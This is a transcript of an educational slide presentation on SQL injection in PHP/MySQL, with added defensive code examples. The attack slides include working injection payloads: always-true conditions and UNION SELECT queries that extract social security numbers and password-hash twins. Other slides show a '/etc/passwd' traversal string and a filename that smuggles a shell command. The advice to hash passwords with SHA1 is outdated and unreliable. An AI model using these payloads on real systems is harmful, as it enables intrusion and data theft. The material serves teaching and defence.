Presentation on theme: "SQL Injection. Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker."— Presentation transcript:

1 SQL Injection

2 Who Am I? Sean Taylor: Computer Science major, software developer, web developer, amateur hacker

3 Who I Work For: Streaming Media Hosting, Inc. Currently looking for a Senior Network and System Administrator; contact smtaylor@csupomona.edu for more information.

4 Software Used: PHP 5, MySQL 5, Apache 2, Vim (it's better than Emacs)

5 What is SQL Injection?

6 Not a software flaw. Arises with concatenation of dynamic queries. Can be performed on anything using an SQL-based language, such as MySQL, PostgreSQL, MS-SQL, and others.

7 What is SQL Injection?
$query = "SELECT * FROM my_table WHERE id = {$_GET['id']}"; // the raw id parameter is pasted straight into the SQL text

8 What is SQL Injection?

9 Attack Techniques

10 Testing for injectable variables: toss in an apostrophe ('), mess with integers, throw in an always-true statement.

11 Attack Techniques: Throwing in apostrophes
files.php?id='
SELECT * FROM my_table WHERE id = '
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

12 Attack Techniques: Messing with integers
files.php?id=1%20hello%20world!
SELECT * FROM my_table WHERE id = 1 hello world!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hello world!' at line 1

13 Attack Techniques: Always-true statements
files.php?id=2%20OR%201=1%20--%20
SELECT * FROM my_table WHERE id = 2 OR 1=1 -- AND …
Returns everything in my_table.

14 Attack Techniques: The UNION keyword. If you have a laptop with you, point yourself to http://www.technotaylor.net/secure/example1.php?showall=yes

15 Attack Techniques: The UNION keyword
Returns:
…?showall=no' UNION SELECT social FROM social_securities --%20
quote in database: 111-11-1111 222-22-2222 333-33-3333 444-44-4444 555-55-5555 666-66-6666

16 Attack Techniques: SELECT AS. http://www.technotaylor.net/secure/example2.php

17 Attack Techniques: SELECT AS
Returns:
…?id=30 UNION SELECT social AS quote FROM social_securities --%20
111-11-1111

18 Attack Techniques: Multi-return vs. single return. Obviously can't perform SELECT *. How do we get around this for multiple values in a SELECT statement?

19 Attack Techniques: Boolean operators can be performed practically everywhere
Returns:
… FROM social_securities WHERE social > '111-11-1111' --%20
222-22-2222
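Each of the probes on the attack slides above leaves a recognisable trace in the web server's access log, which is where a defender usually first sees them. The following is an added example and not part of the presentation: a PHP script that pulls the request target out of each log line, percent-decodes the query string and flags the apostrophe, non-numeric id, always-true and UNION patterns the slides show. The log lines are constructed for this demo and the function and signal names are this example's own.

```php
<?php
// Added example (not from the slides): scan access-log request lines for the
// probe patterns the attack slides show. The log lines below are constructed;
// the paths mirror the slides' files.php / example1.php examples.

$log_lines = [
    '10.0.0.5 - - [01/Jan/2010:10:00:01 -0800] "GET /files.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2010:10:00:02 -0800] "GET /files.php?id=%27 HTTP/1.1" 500 88',
    '10.0.0.5 - - [01/Jan/2010:10:00:03 -0800] "GET /files.php?id=1%20hello%20world! HTTP/1.1" 500 88',
    '10.0.0.5 - - [01/Jan/2010:10:00:04 -0800] "GET /files.php?id=2%20OR%201=1%20--%20 HTTP/1.1" 200 9000',
    '10.0.0.5 - - [01/Jan/2010:10:00:05 -0800] "GET /example1.php?showall=no%27%20UNION%20SELECT%20social%20FROM%20social_securities%20--%20 HTTP/1.1" 200 300',
];

// One regex per slide pattern, applied to each decoded parameter value.
$signals = [
    'apostrophe'     => "/'/",
    'comment_marker' => '~(--|/\*|#)~',
    'always_true'    => '/\b(OR|AND)\s+\S+\s*=\s*\S+/i',
    'union_select'   => '/\bUNION\b.*\bSELECT\b/is',
];

function inspect_request_line($line, array $signals)
{
    // Pull the request target out of the quoted "METHOD /path HTTP/x.y" field.
    if (!preg_match('~"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"~', $line, $m)) {
        return null;
    }
    $target = $m[1];
    $hits   = [];
    $query  = parse_url($target, PHP_URL_QUERY);
    if (is_string($query)) {
        parse_str($query, $params); // percent-decodes %27, %20, ...
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue; // nested array parameters are out of scope here
            }
            foreach ($signals as $label => $regex) {
                if (preg_match($regex, $value)) {
                    $hits[] = "$name: $label";
                }
            }
            // An id that should be a number but is not: the "messing with
            // integers" probe, which has no quote or keyword to match on.
            if ($name === 'id' && !ctype_digit($value)) {
                $hits[] = "$name: non-numeric";
            }
        }
    }
    return ['target' => $target, 'hits' => $hits];
}

foreach ($log_lines as $line) {
    $r = inspect_request_line($line, $signals);
    if ($r === null) {
        continue;
    }
    printf("%-7s %s\n", $r['hits'] ? 'SUSPECT' : 'ok', $r['target']);
    foreach ($r['hits'] as $hit) {
        echo "        - $hit\n";
    }
}
```

Run it with the PHP CLI; only the first line comes back as ok, the other four are flagged with the pattern that matched. The 500 status on the apostrophe and integer probes is itself a signal worth alerting on: the slides' error messages only reach the client when error reporting is left on, but the status code is in the log either way.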

20 Defense Techniques

21 Escaping quotes is not enough. addslashes() and mysql_escape_string() in PHP won't save you! http://www.technotaylor.net/secure/example3.php

22 Defense Techniques: C-string attack. Replace any string in your injection query with a CONCAT of CHARs
Returns:
… SELECT FROM social_securities WHERE social > CONCAT(CHAR(49), CHAR(49), CHAR(49), CHAR(45)…) --%20
222-22-2222

23 Defense Techniques: Take advantage of on-the-fly conversions. Some databases, like MySQL, do on-the-fly conversions. For example, a string can be converted easily to an integer on the fly and vice versa without needing to strictly cast. When strings are properly escaped, there is no breaking out of them.

24 Defense Techniques: Cast your variables at the software layer. PHP has a function called settype(), so a value you received as a string can always be handled as an int.

25 Defense Techniques: If you have a pre-determined set of inputs, use them to your advantage. If you know the values are going to be "red", "blue", or "green", create a switch-case declaration to verify the variables and reject anything else that comes in as invalid.

26 Defense Techniques: If you have a pre-determined length of input, limit the input length at the software layer. If your only valid input is 1-8, limit the length of the input to a single character.
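The three slides above (cast integers, whitelist fixed choices, bound the length) are one procedure: validate at the software layer before anything reaches SQL. The following is an added example, not the presenter's code: three small validators and a loop over constructed inputs standing in for $_GET. It uses filter_var() rather than settype(), and the function names and sample values are this example's own.

```php
<?php
// Added example (not from the slides): validating request parameters at the
// software layer, covering the three tactics on the preceding slides: cast
// integers, whitelist fixed choices, bound the input length. Function names
// and the sample inputs standing in for $_GET are constructed.

function require_int($value, $min = 1, $max = PHP_INT_MAX)
{
    // filter_var rejects "1 hello world!", "2 OR 1=1 -- ", "" and "1.5".
    // settype($value, 'int') would instead silently turn "2 OR 1=1" into 2,
    // which is safe to query with but hides the probe.
    $n = filter_var($value, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    if ($n === false) {
        throw new InvalidArgumentException("expected an integer between $min and $max");
    }
    return $n; // a real PHP int
}

function require_choice($value, array $allowed)
{
    // Strict comparison: "0", "1e0" or an array cannot pass a loose in_array.
    if (!is_string($value) || !in_array($value, $allowed, true)) {
        throw new InvalidArgumentException('value not in the permitted set');
    }
    return $value;
}

function require_max_length($value, $max_len)
{
    // strlen() counts bytes, which is the bound a database column enforces.
    if (!is_string($value) || strlen($value) > $max_len) {
        throw new InvalidArgumentException("input longer than $max_len byte(s)");
    }
    return $value;
}

// Constructed inputs: one clean request and three that should be refused.
$samples = [
    ['id' => '42',           'color' => 'red',   'digit' => '7'],
    ['id' => '2 OR 1=1 -- ', 'color' => 'red',   'digit' => '7'],
    ['id' => '42',           'color' => 'red;',  'digit' => '7'],
    ['id' => '42',           'color' => 'blue',  'digit' => "'"],
];

foreach ($samples as $get) {
    try {
        $id    = require_int($get['id']);
        $color = require_choice($get['color'], ['red', 'blue', 'green']);
        // A length limit alone would still let a lone apostrophe through, so
        // the single-character field is also type-checked as a digit 1-8.
        $digit = require_int(require_max_length($get['digit'], 1), 1, 8);
        // Every value is now an int or one of three fixed literals, so the
        // query below contains nothing the client wrote.
        $sql = sprintf("SELECT * FROM my_table WHERE id = %d AND color = '%s' AND digit = %d",
            $id, $color, $digit);
        echo "OK     $sql\n";
    } catch (InvalidArgumentException $e) {
        echo 'REJECT ' . json_encode($get) . ': ' . $e->getMessage() . "\n";
    }
}
```

The last sample is the case the length slide does not cover on its own: a single apostrophe is one character long and would pass a pure length check, so the length bound is combined with the integer check. Rejecting rather than coercing also keeps the probe visible in your logs.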

27 Defense Techniques: Use prepared statements when possible. PHP comes with an awesome SQL security suite called PEAR DB.

28 Defense Techniques: If prepared statements aren't a possible solution, use SQL libraries built for this purpose:
SafeSQL http://www.phpinsider.com/php/code/SafeSQL/
StrictDB http://www.technotaylor.net/strictdb/
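To show what "use prepared statements" buys you, here is an added example (not from the presentation) that runs the concatenated query from the "What is SQL Injection?" slide beside a prepared statement against the same data. It uses PDO with an in-memory SQLite database, which is assumed to be available (pdo_sqlite ships with PHP), so it runs offline; against MySQL only the DSN line changes. The table, rows and function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): the concatenated query from the
// "What is SQL Injection?" slide beside a prepared statement, run against an
// in-memory SQLite database through PDO so it works offline; for MySQL only
// the DSN changes. Table and rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE my_table (id INTEGER PRIMARY KEY, quote TEXT)');
$db->exec("INSERT INTO my_table (id, quote) VALUES (1, 'first'), (2, 'second'), (3, 'third')");

function lookup_concatenated(PDO $db, $id)
{
    // The slide's pattern: the raw parameter becomes part of the SQL text.
    $query = "SELECT * FROM my_table WHERE id = $id";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

function lookup_prepared(PDO $db, $id)
{
    // The SQL is compiled first with a placeholder; the value is sent
    // separately and is never parsed as SQL, so operators and comment
    // markers inside it carry no meaning.
    $stmt = $db->prepare('SELECT * FROM my_table WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A normal id, then the always-true probe from the attack slides.
foreach (['2', '2 OR 1=1 -- '] as $input) {
    printf("input %-16s concatenated: %d row(s)   prepared: %d row(s)\n",
        json_encode($input),
        count(lookup_concatenated($db, $input)),
        count(lookup_prepared($db, $input)));
}
```

With the probe as input the concatenated form returns all three rows, exactly what slide 13 describes, while the prepared form returns none, because the whole string is compared against the id column as a value. mysqli's prepare()/bind_param() gives the same separation of SQL from data. Prepared statements do not replace the validation on the previous slides: an id that is meant to be a number should still be checked as one before it is bound.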

29 General Security Tips

30 PHP specific: Never, ever, ever, EVER use eval(). Don't use $_REQUEST; use $_GET, $_POST and $_COOKIE instead. Turn off magic_quotes_gpc; they're useless and annoying. Add "php_flag magic_quotes_gpc off" to your .htaccess file. If you're not debugging, turn off error reporting with error_reporting(0).

31 General Security Tips: Cross-site scripting (aka XSS). Problem: user can put in HTML tags. Solution: strip and replace all HTML-specific characters: & => &amp;, " => &quot;, ' => &#039;, < => &lt;, > => &gt;. PHP has a function that does this for you: htmlspecialchars("string goes here");
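One detail behind the slide's table: the ' => &#039; conversion only happens when htmlspecialchars() is called with ENT_QUOTES; before PHP 8.1 the default flags leave the single quote alone, which matters inside single-quoted attribute values. The following is an added example, not from the presentation, wrapping the call in a small helper; the helper name h() and the sample string are this example's own.

```php
<?php
// Added example (not from the slides): an output-escaping helper wrapping
// htmlspecialchars(). The h() name and the sample string are this example's own.

function h($s)
{
    // ENT_QUOTES is what makes the single quote become &#039;; before PHP 8.1
    // the default flags (ENT_COMPAT) leave ' untouched, which matters inside
    // single-quoted attribute values. Passing the charset avoids mis-decoding.
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

$user_input = 'Tom & Jerry\'s <"friends">'; // constructed: one of each special character

// The same value in the three places page templates usually put it.
echo '<p>' . h($user_input) . "</p>\n";
echo '<input value="' . h($user_input) . "\">\n";
echo "<input value='" . h($user_input) . "'>\n";

// Contrast: default flags on PHP < 8.1 leave the apostrophe alone.
echo htmlspecialchars($user_input) . "\n";
```

Escape at output time, in the template, rather than on the way into the database: the stored value stays intact and every place that prints it gets the same treatment.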

32 General Security Tips: Directory traversal. Problem: input argument is a file to be read on the server. Solution: don't do that, because it is very stupid. If someone puts in an argument for the file called "../../../etc/passwd", congratulations, you've compromised your server by showing off the password file!

33 General Security Tips: File uploads. MIME types are never to be trusted. Neither are file extensions. To verify a file's actual type, you may have to go as far as opening the file and inspecting its header information! Beware how you handle filenames: browsers can be manipulated to send malicious file extensions, such as "my_picture.jpg; cat ../../../etc/passwd".
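The two slides above share one fix: never let a client-supplied name decide which file is read or written, and judge a file by its contents. The following is an added example and not the presenter's code: a helper that confines a requested name to one directory, and an upload check that uses finfo (libmagic) on the file's header instead of its extension or the browser-sent MIME type. It assumes the fileinfo and openssl extensions are loaded; the directory, file names and helper names are constructed.

```php
<?php
// Added example (not from the slides): confining a client-supplied file name
// to one directory, and judging an upload by its bytes rather than by its
// extension or the browser-sent MIME type. Directory and file names are
// constructed; the helpers are this example's own.

$base_dir = sys_get_temp_dir() . '/demo_public';
if (!is_dir($base_dir)) {
    mkdir($base_dir, 0700);
}
file_put_contents($base_dir . '/readme.txt', "hello\n");

function resolve_within($base_dir, $requested)
{
    // basename() strips any directory part ("../../../etc/passwd" -> "passwd");
    // realpath() then canonicalises, and the prefix test proves the result is
    // still inside $base_dir (this also catches a symlink pointing elsewhere).
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($requested));
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function sniff_type($path)
{
    // libmagic looks at the file header; the extension and
    // $_FILES[...]['type'] play no part.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $path);
    finfo_close($finfo);
    return $mime;
}

function accept_upload($tmp_path)
{
    // Allowed content types and the extension *we* assign for each.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    $mime = sniff_type($tmp_path);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // The client's file name is never reused: a random name, our extension.
    return bin2hex(openssl_random_pseudo_bytes(8)) . '.' . $allowed[$mime];
}

foreach (['readme.txt', '../../../etc/passwd', 'missing.txt'] as $name) {
    $p = resolve_within($base_dir, $name);
    printf("%-22s -> %s\n", $name, $p === null ? 'refused' : $p);
}

// Two constructed "uploads": a text file wearing a .jpg name, and a real 1x1 PNG.
$fake = $base_dir . '/upload_a';
file_put_contents($fake, "not really an image\n");
$real = $base_dir . '/upload_b';
file_put_contents($real, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='));
$uploads = ['my_picture.jpg; cat ../../../etc/passwd' => $fake, 'photo.png' => $real];
foreach ($uploads as $client_name => $tmp) {
    $stored = accept_upload($tmp);
    printf("%-42s -> %s\n", $client_name, $stored === null ? 'rejected' : 'stored as ' . $stored);
}
```

The traversal name is refused because basename() throws away the directory part and "passwd" does not exist under the public directory; the prefix check is what still protects you when a file of that name does exist but is reached through a symlink. For uploads the client's name is only ever printed, never used as a path, so the shell-looking extension on the slide is just an odd string.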

34 General Security Tips: Password storing. Don't use two-way encryption. MD5 has been broken; use SHA1. Don't forget to salt your hashes!

35 General Security Tips: Salting your hashes. Salting is appending or prepending an 8-16 character string of random characters to an incoming password and hashing the result. Salting keeps people from performing dictionary attacks on your database. http://www.technotaylor.net/secure/example4.php?showall=yes

36 General Security Tips: An SQL-injected dictionary hash attack
Returns:
…?showall=no' UNION SELECT username FROM users WHERE hash = (SELECT hash FROM users WHERE username = 'CRASH_OVERRIDE') AND NOT username = 'CRASH_OVERRIDE' --%20
registered users in database: bob steve bill
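The injected query on this slide works because unsalted hashing maps equal passwords to equal hashes, so one cracked account reveals every account sharing its password. The following is an added example, not the presenter's code, implementing per-user salting as the "Salting your hashes" slide describes and counting how many hash twins each scheme exposes. Function names, user names and passwords are constructed; the hash algorithm is a parameter (the slide recommends SHA1; sha256 is the default here), and hash_equals() needs PHP 5.6 or later. On PHP 5.5+ password_hash()/password_verify() (bcrypt with a built-in salt) is the standard replacement for hand-rolled salting.

```php
<?php
// Added example (not from the slides): per-user salted hashing as the
// "Salting your hashes" slide describes, and why it defeats the hash-twin
// query on the slide after it. Function names, user names and passwords are
// constructed. The algorithm is a parameter; the slide recommends SHA1, the
// default here is sha256. On PHP 5.5+, password_hash()/password_verify()
// (bcrypt with a built-in salt) is the standard replacement for this scheme.

function make_salt($bytes = 8)
{
    // 8 random bytes -> 16 hex characters, inside the slide's 8-16 range.
    return bin2hex(openssl_random_pseudo_bytes($bytes));
}

function salted_hash($password, $salt, $algo = 'sha256')
{
    // Stored as "algo$salt$digest" so the salt travels with the hash.
    return $algo . '$' . $salt . '$' . hash($algo, $salt . $password);
}

function verify_salted($password, $stored)
{
    list($algo, $salt, $digest) = explode('$', $stored, 3);
    // hash_equals() (PHP 5.6+) compares in constant time.
    return hash_equals($digest, hash($algo, $salt . $password));
}

// Three registered users, two of whom picked the same password.
$passwords = ['bob' => 'hunter2', 'steve' => 'hunter2', 'bill' => 'correct horse'];

$unsalted = [];
$salted   = [];
foreach ($passwords as $user => $pw) {
    $unsalted[$user] = hash('sha256', $pw);
    $salted[$user]   = salted_hash($pw, make_salt());
}

// The injected query on the slide above lists users whose stored hash equals
// a known user's hash. Count how many such "twins" each scheme exposes.
function count_hash_twins(array $table, $user)
{
    $twins = 0;
    foreach ($table as $other => $h) {
        if ($other !== $user && $h === $table[$user]) {
            $twins++;
        }
    }
    return $twins;
}

printf("unsalted: users sharing bob's hash = %d\n", count_hash_twins($unsalted, 'bob'));
printf("salted:   users sharing bob's hash = %d\n", count_hash_twins($salted, 'bob'));
printf("verify right password: %s\n", verify_salted('hunter2', $salted['bob']) ? 'yes' : 'no');
printf("verify wrong password: %s\n", verify_salted('hunter3', $salted['bob']) ? 'yes' : 'no');
```

Unsalted, bob and steve share a hash and the injected query finds the twin; salted, the two rows differ even though the passwords are the same, and a dictionary attack has to be rerun per user with that user's salt. The salt is not secret, which is why it can sit in the same column as the digest.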

37 More Information

38 Good ol' Wikipedia http://en.wikipedia.org/wiki/SQL_injection
Toorcon presentation on SQL injection http://video.google.com/videoplay?docid=5773019873031992689
PHP Security whitepaper http://www.acunetix.com/websitesecurity/php_whitepaper.pdf

39 The End You have just lost The Game.

